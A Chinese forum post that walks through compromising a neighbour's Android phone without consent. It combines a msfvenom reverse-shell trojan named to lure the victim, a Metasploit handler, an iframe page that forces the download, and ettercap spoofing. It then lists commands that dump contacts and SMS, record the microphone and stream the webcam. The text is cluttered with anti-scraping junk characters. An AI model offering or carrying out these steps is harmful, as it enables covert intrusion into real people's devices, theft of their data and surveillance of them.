找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
返回列表 发新帖
查看: 2621|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

- [$ Z$ f, N ^8 U7 a+ A; n 五、msf+ettercap入侵邻居安卓手机 % }9 {' u& l* E( q1 w

' i3 t) s9 Z. ~4 N

2 c8 Q( \8 T7 X. F' | 首先启动msf 4 z2 c R/ p# I. E7 l: M

x( Z: I1 [) ?7 x/ h8 L* I) P

% ], k2 q7 M5 N8 ` 先用kali生成一个安卓木马,如下命令: _+ J3 q2 o! i# Z) h" L

+ O# q4 I& r$ a

, N& {, t5 U0 \/ I/ ? Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk ; Z" e; V. O' c$ h

2 Z" K/ C: w+ a! f

( k) J% ^$ P8 Q 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 6 ?8 g6 B4 K: ~

! _% z8 I- U: k. h- X6 O/ Z

0 ]# A- x/ P' c& Q. | 然后进入msf * |5 {( o T" g O

# `; t6 E5 J# g2 I

, d# o; S7 I. u: u, Y. z use exploit/multi/handler . p, s2 W4 ~! t, V: C; P

* o3 H# y y: v. L

6 `: B c0 N5 p& z( g set payload android/meterpreter/reverse_tcp 5 e1 G8 c, r, B0 m( ?: C' I0 M

+ D# Y4 J* F# X9 V

, E9 ^4 o$ @9 z* ^ set LHOST 192.168.0.109 //ipkailiip 0 F1 H& F, |- j z. V7 Y1 [- u

3 j+ |9 e# x1 H" d7 Y

8 R1 G a; ]* N! D. ]8 r( _( Y set LPORT 44444 //端口一定要与前面生成的木马的端口一致 & J+ h: |& y0 p5 u* X5 R

5 k$ i0 i! Z9 i- k+ |. g6 i0 ^0 }

4 _8 E" _8 G; i$ m; Z+ m Exploit ( g. \" t G9 v2 E6 B

w, s; ^; e: L4 U

$ B. f& Z/ W5 K% v$ [* Q   0 Z' e' n8 D# _

/ S. J5 q, G0 w, Q8 F' m' j t

4 N. y5 ^; A; {8 T* j: y 下面我们开启ettercap -G + n: m8 O% Z5 V3 E( w+ u

$ |" v% s8 M. r0 [

x4 U! L2 X! O5 i 我物理IP * a# _1 z2 X4 b; n. f& g

Q4 d) H0 `- [. `9 f

6 v# z: P+ x% Z j   3 o; u# r, h/ M) ~) l

. F& h1 r6 Z+ V

$ ~. K# e- D8 N6 L& b) t6 J) q4 C; f 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, " J9 f/ Y2 T2 _! R" P

, ~* }7 c! b' y

0 y/ n6 i) V& B! |6 b# ] 下面我们来设置一下 + t* K N6 u! y d9 e

; x9 R% S0 {* c

& D' Q/ a! B% q   * [' L: K7 h5 S6 V, T! ~

1 d' ~5 i3 e+ D; k q2 r ]

' N& t* ]6 Q/ Y, R* | 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, # [' H# n0 c. H$ {

. R5 C4 o8 f0 B

' l/ S% c3 v6 ~* L3 @   : a" i7 _4 m. }# c

6 i2 }# k) X f) r" Z

) ]# x! i. k e2 f   , n8 ` }: U( O$ R; y$ X

7 z3 H! y: ]! _9 V5 w

$ Y) m3 Y8 ^/ e   , M @4 Z- e& \- j- G8 L5 N" t

$ y6 y* h+ }' M4 h2 w

9 X4 L1 t, n3 `; g   1 F2 W6 X6 [, o9 o$ X

' t5 U" F, i( T7 R+ q, _

; j6 l% ?7 l( s% N   # e4 t. t r/ ^% E) U9 W- Q

1 R+ U) F# ?2 |5 M9 d

Z4 D$ f: F: w! e, D3 r   & Y8 R$ I" q; P2 I) c( C2 {6 R

# G4 C) Y% S! O

7 U- W+ |7 P6 Y3 t' U   4 g% L7 e0 d7 n( I$ R: o. n( i

. U$ x/ h _( S* o# b

7 `/ E$ z6 u' g" e M) d   : @4 Q' u9 A3 b1 b3 E) S% Z( S

+ ] Z' j V# l0 e' y Q$ a4 c. t

0 S5 _+ |: d; u( R+ m   / A( q0 F$ g, N. k, u" s. q

8 ~ U; g+ v2 U3 ~

" f/ y' k$ o$ L' C8 D/ h3 G   + N$ R4 S6 ?: ]5 i8 O8 V

6 c$ p! [/ P3 D1 R6 ?% L ], X

g% m: Q. e ^8 z   & j8 Q0 J, C1 v2 B4 q

) q) ?' q3 L% v: s

8 t, A, e1 T. l6 r3 }9 f   ' L) U# B$ V: ]6 c8 v" d

( H6 j T, N1 r& h& Z& s- s

) Z$ |! I- @" b   ! w; F7 D2 u5 X

2 B1 g3 s8 j. p4 e: u" \ X1 b0 K

" L. H, N/ P5 t 下面我们开始攻击 ( O! J7 p$ g0 V# B

' Q1 ~2 Q* n' U& U k

% }8 r) Y4 b- ~: ^- g   + S/ p1 B" h4 I: q. x1 i

& J8 w/ Q6 c0 t7 k1 _6 h, ^6 b

' O! B6 u, h+ A   # i5 v/ h* N& S' G" i/ }8 t

4 [9 ~3 M: l6 V/ k) G& Q5 W# q: |

- p' X8 D: @& f# D   : {* \! T" M; n

" j4 M/ B) A0 e( ]- `0 _" G) B" h

* C9 k8 R. [ G' n7 @. _( U% [   . a/ M: }9 t+ s/ G5 P, x

" G9 a) @( c1 d3 L6 \* M

) H1 a4 ]8 i$ \/ J6 m" v8 X& p   & @2 Q0 _* ?4 T7 J

" m! h- t2 s) ^

6 \% S v) ]2 d$ e% G 大概过了5分钟多,发现反弹成功了 ( ]* S% G$ o) } ?2 e

# N. N4 B2 S5 A N0 l

8 K. D: ^# q. H7 S3 U2 ^/ G0 u   % I1 y9 Y$ Q; N/ E

) f# f- N9 `4 x; S3 @, ?# h

" ]5 Q& A% o* I( Q& v9 Q   % Y7 g2 y! ^0 o( @( U4 L0 o5 L

' M7 m9 S |" b# x

* A7 Y! f, H8 C$ h& B% Y   ) I$ }6 F! y( E1 ^1 D# R

, Z& u) H4 O/ L7 B: W" P: F$ ?5 b

" r3 @ }. N# U8 g   5 a) B7 j. \& a6 J4 _! Q3 Q6 y

9 X/ Y9 E. R) i' S' N7 [/ I6 a

4 e' q6 F0 p8 z   + o) S& H8 \; k- p

3 I3 K; x6 U7 E+ o: H2 f

/ H$ ~& f: H; z4 T, m( `   1 C3 H5 \7 W! ^. y' E3 X

. s# s0 ^; y! g4 R4 V+ C1 P9 L

. H. Y3 {% o9 n/ L3 t; y7 |   % l& B+ q- E* E

1 ~# c7 t, W5 D4 o: p

& n( @) q9 J+ P/ U 执行命令 * G# c# f* r0 Z

! {& X7 ?) L+ y, N( S

U4 f1 L/ p5 l) Q; l   4 d8 ~# A6 Y- c! j* ]3 Y

7 r+ a! b) o& v9 Z! M5 D( K

/ k. a* `+ K/ ?9 P dump_contacts    --》这个是导出电话 ' d4 _+ d8 h0 P" v

" j9 b" B) I" k% ]$ I/ d1 f* z- _

" }$ X8 S+ o% W7 d( A2 n( J; } dump_sms --》这个是导出信息 3 M1 T3 T5 @5 ?4 O) s/ T% u

+ w( @" H: W4 B1 L0 C+ n8 h/ }+ r7 g

3 ?' J4 _% ^3 Z4 t4 o% R: X record_mic     Record audio from the default microphone for X seconds 7 ~( A+ z& Y) o- _- \

' C; k& `0 c6 v

3 x+ G) g% L+ h: w4 m; |     webcam_chat    Start a video chat ) i. u1 M1 M2 J# } V

: f" G2 ^$ n+ Q

7 [( f2 K6 Z3 J! R! j4 p; \     webcam_list    List webcams 2 a7 d2 c5 S- [! ~

; ~# d% Z3 Z" V3 U6 \' C! x

8 c+ `& X3 \; t S     webcam_snap    Take a snapshot from the specified webcam 8 b! {+ U& H, p+ E ^$ Y& I

3 k* t, v# D% E n) o/ m5 c8 q

' O, I9 r# j" _8 u7 L5 v" s webcam_stream  lay a video stream from the specified webcam % L, Q3 \8 h7 q& R% \' p& ]5 {

3 A; v) T7 h. w* h: @5 v6 z; I

9 v! b6 f9 M% ^7 c) M" k$ q   4 [0 K5 P+ j* N: _ C

$ w; ^0 e, i! {- w& |

6 z) s- A! M7 t2 h2 K, W; U   " A! v: w0 H: M/ X% V

$ N- Z* E6 w# T2 r% {0 E+ W* V

1 B4 e/ s' b! w7 Y' A 我们打开看一下电话薄, : W! t3 k8 k4 H

8 @9 Z) o+ G8 B% Z5 }/ L9 M

/ D! L( B' ?2 t1 v! Y8 Y5 K7 E2 e   . h# d5 \) B9 Z+ r9 u2 j7 r4 u

/ l4 _4 M4 V* M, ^" O+ ^1 y2 Z

/ G! P7 {5 {. \ H   " F7 O8 y- x2 s' O

* O z0 I* i; e' h

7 p. e% f/ }/ D6 a: J6 T   0 q- k6 w! z2 r( u* |

, |! n1 t6 x5 K [* T

' r: X5 F2 q1 t6 B0 S) W+ y: R   8 }$ e2 R8 o* y2 n2 ~4 p# V

9 Q! q: n: V( s7 ^8 e

/ l7 N8 @! t9 L! u; [   * I$ [* S' E* T9 C4 |( t& X

& o% O! `- f* u1 ^3 n

( ]5 ~6 ^, N$ O0 y8 e   $ R$ ] R6 Q1 I4 O

4 O/ h6 T0 F7 i" L% O4 r* N& G1 Q( b3 z

6 Z& F4 X# }# o- K4 f( [ 我们同时欺骗成DroidJack木马,使用方法如图: 7 T u- ^2 r6 ]9 [7 R$ j0 N

+ _% B$ |8 ~. f" ~6 ^

7 _: A9 w- b; T8 A& Y* P; V   # b; v. b( I. f/ V: {

M! |1 e O- A* s r+ }/ t4 p

0 ]0 R1 F; G/ }0 F2 e+ Q1 J   ( l/ i6 l9 f7 S3 Z( `" w* X

+ ?$ H$ W1 G2 A. j E/ |6 H! M

/ R& f& H8 X7 \# }+ @8 r   & O9 ^' b) W/ t1 K! r% F! d

8 T( G8 l6 ^3 l; {& T

+ W# V% B" C# F, ^# @ 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 ' t, l# G, }' [

1 [: m. X/ |" L& B! `; e

6 r4 J! @- L5 N   0 N! j i8 U( ~' _ M' u" n

. L4 Q4 A6 o3 [. F5 E2 q5 P

7 v( i) z" C; |5 I8 E0 v   , e& q" `7 J7 ?9 p( W

5 }3 `. L! y+ n

- X! a8 o1 [* x   2 e5 f9 i: d8 {& R

9 R4 q, g9 u! @

; m8 U& p! \9 {0 g: ?( G 7 H3 X- e& |; Q2 Y* ?1 p; y [

; M; U4 e' f" Z- F4 a2 ?. q& s2 W

- D# s) q. G3 `. W: w
2 s( k( |9 X# S% x

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表